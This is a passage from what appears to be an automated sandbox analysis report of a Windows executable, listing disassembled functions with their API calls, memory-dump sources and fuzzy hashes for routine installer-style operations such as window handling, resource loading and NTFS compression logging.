                                                                                • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B87
                                                                                • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BC6
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: LoadString$FileMessageModuleName
                                                                                • String ID:
                                                                                • API String ID: 704749118-0
                                                                                • Opcode ID: 951c1155a055777031086f0b90c3083af3c2960daf331f13f5541ebbba7c3e7d
                                                                                • Instruction ID: 11344639af0fa1b95b6fef638a25282c94d515b30ba3ed4b3402aedba36e13da
                                                                                • Opcode Fuzzy Hash: 951c1155a055777031086f0b90c3083af3c2960daf331f13f5541ebbba7c3e7d
                                                                                • Instruction Fuzzy Hash: 843133706083849ED330EA658945B9F77D89B85304F40483FF6C8D72D1DB79A9048B67
                                                                                Function 0044E8D4 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E91D
                                                                                  • Part of subcall function 0044CF60: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CF92
                                                                                • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E9A1
                                                                                  • Part of subcall function 0042BBC4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBD8
                                                                                • IsRectEmpty.USER32(?), ref: 0044E963
                                                                                • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E986
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                                • String ID:
                                                                                • API String ID: 855768636-0
                                                                                • Opcode ID: 919708f5ffdde2f57f521d6641e4cc0e1a287a75e8cdc9711807c6008472dbb9
                                                                                • Instruction ID: 03991ef50c1cdc1947edd1d0bf9da16660927dd763c0b41cb42d654f0fd6bbd7
                                                                                • Opcode Fuzzy Hash: 919708f5ffdde2f57f521d6641e4cc0e1a287a75e8cdc9711807c6008472dbb9
                                                                                • Instruction Fuzzy Hash: 47113871B5030027E250AA7A9C86B5B76899B88748F14093FB546EB3C7EE7DDC09429D
                                                                                Function 004952F4 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OffsetRect.USER32(?,?,00000000), ref: 00495358
                                                                                • OffsetRect.USER32(?,00000000,?), ref: 00495373
                                                                                • OffsetRect.USER32(?,?,00000000), ref: 0049538D
                                                                                • OffsetRect.USER32(?,00000000,?), ref: 004953A8
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: OffsetRect
                                                                                • String ID:
                                                                                • API String ID: 177026234-0
                                                                                • Opcode ID: 39b7304c59ecfeab53ef959acea8ec35100b2c2eb9a0585a5ab9f65ef9bb45fe
                                                                                • Instruction ID: af1c1dfc71d00ff4a9a929e8d6bf6bfabc08d13bc1b1844b1e7d273cf48c6b2a
                                                                                • Opcode Fuzzy Hash: 39b7304c59ecfeab53ef959acea8ec35100b2c2eb9a0585a5ab9f65ef9bb45fe
                                                                                • Instruction Fuzzy Hash: 94217CB6700701ABD700DE69CD85E5BB7DEEBC4344F24CA2AF954C7249D634ED0487A6
                                                                                Function 00417228 Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCursorPos.USER32 ref: 00417270
                                                                                • SetCursor.USER32(00000000), ref: 004172B3
                                                                                • GetLastActivePopup.USER32(?), ref: 004172DD
                                                                                • GetForegroundWindow.USER32(?), ref: 004172E4
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                                • String ID:
                                                                                • API String ID: 1959210111-0
                                                                                • Opcode ID: ab2bc15dd938f987afbfcd80c1a154205083a351e68354f3dc1a1c3122339836
                                                                                • Instruction ID: a2974bbdd40a4ad71efed6c963999b1e78101043f5dd1c0306289f7dfca9f025
                                                                                • Opcode Fuzzy Hash: ab2bc15dd938f987afbfcd80c1a154205083a351e68354f3dc1a1c3122339836
                                                                                • Instruction Fuzzy Hash: 4321A1313082018BCB20AB69E985AE733B1EF44754B0545ABF854CB352D73CDC82CB89
                                                                                Function 00494FAC Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MulDiv.KERNEL32(8B500000,00000008,?), ref: 00494FC1
                                                                                • MulDiv.KERNEL32(50142444,00000008,?), ref: 00494FD5
                                                                                • MulDiv.KERNEL32(F70577E8,00000008,?), ref: 00494FE9
                                                                                • MulDiv.KERNEL32(8BF88BFF,00000008,?), ref: 00495007
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                • Instruction ID: c81a7ae82503e1df060b9d2e8e6c822c04bb2cec442f3182d8fec1f0f0e8f71f
                                                                                • Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                • Instruction Fuzzy Hash: 48112472604204ABCF50DE99C8C4D9B7BECEF4D320B1541A6F918DB246D674DD408BA4
                                                                                Function 0041F490 Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetClassInfoA.USER32(00400000,0041F480,?), ref: 0041F4B1
                                                                                • UnregisterClassA.USER32(0041F480,00400000), ref: 0041F4DA
                                                                                • RegisterClassA.USER32(00499598), ref: 0041F4E4
                                                                                • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F51F
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                • String ID:
                                                                                • API String ID: 4025006896-0
                                                                                • Opcode ID: 17400656b2714228e1ab5d36733c826c34e0b7aebe27f437723bcf7a68a21383
                                                                                • Instruction ID: e8d232a05c88a2160d81946a52d6ac90de0a8bd7e5396313334bc6410d622602
                                                                                • Opcode Fuzzy Hash: 17400656b2714228e1ab5d36733c826c34e0b7aebe27f437723bcf7a68a21383
                                                                                • Instruction Fuzzy Hash: 7B011B722401047BDA10EB6DED81E9B3799D719314B11413BBA15E72A1D7369C154BAC
                                                                                Function 00454F68 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WaitForInputIdle.USER32(00000001,00000032), ref: 00454F94
                                                                                • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00454FB6
                                                                                • GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 00454FC5
                                                                                • CloseHandle.KERNEL32(00000001,00454FF2,00454FEB,?,00000031,00000080,00000000,?,?,0045534B,00000080,0000003C,00000000,00455361), ref: 00454FE5
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                                • String ID:
                                                                                • API String ID: 4071923889-0
                                                                                • Opcode ID: 45540edf5afa8ba95db9dec670ac0957df4a9836c83591dc179b3e9a7f9926ac
                                                                                • Instruction ID: 44a5693fa59bfbe72ab063cfacecacb9b789a88f4d4f9747d0667cdf65a63c8e
                                                                                • Opcode Fuzzy Hash: 45540edf5afa8ba95db9dec670ac0957df4a9836c83591dc179b3e9a7f9926ac
                                                                                • Instruction Fuzzy Hash: 7201F9716046087EEB20979E8C06F6B7BACDF44774F610167F904DB2C2C6785D40C668
                                                                                Function 0040D210 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D227
                                                                                • LoadResource.KERNEL32(00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047C7C4,0000000A,REGDLL_EXE), ref: 0040D241
                                                                                • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047C7C4), ref: 0040D25B
                                                                                • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?), ref: 0040D265
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                • String ID:
                                                                                • API String ID: 3473537107-0
                                                                                • Opcode ID: 98a3eb2f97eb90f8deac50020965559c1c53970ac69ea9c81a72a03a0abc3839
                                                                                • Instruction ID: 8b55825d53d46818f15098a3aa340eb6897fe62b828c159971ec5f2842f97e2f
                                                                                • Opcode Fuzzy Hash: 98a3eb2f97eb90f8deac50020965559c1c53970ac69ea9c81a72a03a0abc3839
                                                                                • Instruction Fuzzy Hash: ADF062736046046F8704EE9DA881D5B77ECDE88364310017FF908EB246DA38DD018B78
                                                                                Function 0047009C Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLastError.KERNEL32(00000000,00000000), ref: 004700ED
                                                                                Strings
                                                                                • Failed to set NTFS compression state (%d)., xrefs: 004700FE
                                                                                • Setting NTFS compression on directory: %s, xrefs: 004700BB
                                                                                • Unsetting NTFS compression on directory: %s, xrefs: 004700D3
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                                • API String ID: 1452528299-1392080489
                                                                                • Opcode ID: dfebb939fa925478a91c01d20c19499446f2cbe0988f19a8e93b7205f6de1292
                                                                                • Instruction ID: 8e5543267561a70d3fbbbef991b1365390ff1382f756d9cdf86c8bb39141f558
                                                                                • Opcode Fuzzy Hash: dfebb939fa925478a91c01d20c19499446f2cbe0988f19a8e93b7205f6de1292
                                                                                • Instruction Fuzzy Hash: C9011730E0928C96CF05D7ADA0412DDBBF4DF4D314F84C1AFA45DE7282DA790609879A
                                                                                Function 00470848 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,00000000), ref: 00470899
                                                                                Strings
                                                                                • Unsetting NTFS compression on file: %s, xrefs: 0047087F
                                                                                • Setting NTFS compression on file: %s, xrefs: 00470867
                                                                                • Failed to set NTFS compression state (%d)., xrefs: 004708AA
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                                • API String ID: 1452528299-3038984924
                                                                                • Opcode ID: 323dc33fe38fce2a535158e710f937577eac4405a22a140b88caf43724a8761b
                                                                                • Instruction ID: 78fa65e16581c334b53b8e167e27839d8ecb3154876bc13dabe901d18edf2e93
                                                                                • Opcode Fuzzy Hash: 323dc33fe38fce2a535158e710f937577eac4405a22a140b88caf43724a8761b
                                                                                • Instruction Fuzzy Hash: 5C01F430D092489ADB04A7E9A4412EDBBF49F09314F45C1ABA459E7282DAB9050947DB
                                                                                Function 00455D88 Relevance: 6.0, APIs: 4, Instructions: 41registrywindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045BB12,?,?,?,?,?,00000000,0045BB39), ref: 00455DC4
                                                                                • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045BB12,?,?,?,?,?,00000000), ref: 00455DCD
                                                                                • RemoveFontResourceA.GDI32(00000000), ref: 00455DDA
                                                                                • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455DEE
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                                • String ID:
                                                                                • API String ID: 4283692357-0
                                                                                • Opcode ID: 5aa6bc1fef2ece3e1d74d37f8f7457d5ece9b91b834f41029562ebbb00b702db
                                                                                • Instruction ID: 88a6b2d0cd2ebf9d052afffcb5c4be27c29a8e8e48dcb03e602a07ae18d4e81c
                                                                                • Opcode Fuzzy Hash: 5aa6bc1fef2ece3e1d74d37f8f7457d5ece9b91b834f41029562ebbb00b702db
                                                                                • Instruction Fuzzy Hash: E3F05EB6B4470176EA10B6B69C8BF2B229C9F54745F10883BBA00EF2C3D97CDC04962D
                                                                                Function 0047CA00 Relevance: 6.0, APIs: 4, Instructions: 35sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$CountSleepTick
                                                                                • String ID:
                                                                                • API String ID: 2227064392-0
                                                                                • Opcode ID: b259759894679f81c91e5f8e49ac887a4ee880673b8cc13734a950e5130029b9
                                                                                • Instruction ID: e9c2c7e2fc271270d41d52dba3350464f1e42bdffd51bbfd166b1ef271046f5a
                                                                                • Opcode Fuzzy Hash: b259759894679f81c91e5f8e49ac887a4ee880673b8cc13734a950e5130029b9
                                                                                • Instruction Fuzzy Hash: 93E02B7130964845CA24B2BE28C37BF4A88CB8536AB14453FF08CD6242C42C4D05956E
                                                                                Function 00478120 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,00480D8E,?,?,?,?,?,004986AB,00000000), ref: 00478129
                                                                                • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,00480D8E,?,?,?,?,?,004986AB), ref: 0047812F
                                                                                • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,00480D8E), ref: 00478151
                                                                                • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,00480D8E), ref: 00478162
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                • String ID:
                                                                                • API String ID: 215268677-0
                                                                                • Opcode ID: fbd84f65280b9b42d2110702e409595f627c02f938f534a1f8f22361ecaea6e1
                                                                                • Instruction ID: 3331d84468cd062744280f6e1aa24963878bc2b2d96e3aea022572b3ec77581d
                                                                                • Opcode Fuzzy Hash: fbd84f65280b9b42d2110702e409595f627c02f938f534a1f8f22361ecaea6e1
                                                                                • Instruction Fuzzy Hash: 70F030716843016BD600EAB5CC82E9B77DCEB44754F04893E7E98D72C1DA79DC08AB66
                                                                                Function 00424250 Relevance: 6.0, APIs: 4, Instructions: 26windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLastActivePopup.USER32(?), ref: 0042425C
                                                                                • IsWindowVisible.USER32(?), ref: 0042426D
                                                                                • IsWindowEnabled.USER32(?), ref: 00424277
                                                                                • SetForegroundWindow.USER32(?), ref: 00424281
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                                • String ID:
                                                                                • API String ID: 2280970139-0
                                                                                • Opcode ID: 3290ed535df25d2f1ddaed747f1c047a4a496922c2b2cea1102cb49f09a67e5c
                                                                                • Instruction ID: cc3e18b4355afb8de1117362fa5ee1cc3bb5bcb08e60588071b409dab7082488
                                                                                • Opcode Fuzzy Hash: 3290ed535df25d2f1ddaed747f1c047a4a496922c2b2cea1102cb49f09a67e5c
                                                                                • Instruction Fuzzy Hash: DBE08691B02571929E71FA671881A9F018CCD45BE434602A7FD04F7243DB1CCC0041BC
                                                                                Function 00406284 Relevance: 6.0, APIs: 4, Instructions: 11memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GlobalHandle.KERNEL32 ref: 00406287
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0040628E
                                                                                • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00406293
                                                                                • GlobalLock.KERNEL32(00000000), ref: 00406299
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Global$AllocHandleLockUnlock
                                                                                • String ID:
                                                                                • API String ID: 2167344118-0
                                                                                • Opcode ID: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                                • Instruction ID: ad050c8fb554795a0ca7e59246f03ac17dd57b6c6051e6027a9978793207e39e
                                                                                • Opcode Fuzzy Hash: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                                • Instruction Fuzzy Hash: A0B009C5814A05B9EC0833B24C0BD3F141CD88072C3808A6FB458BA1839C7C9C402A3D
                                                                                Function 0047A064 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 210registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
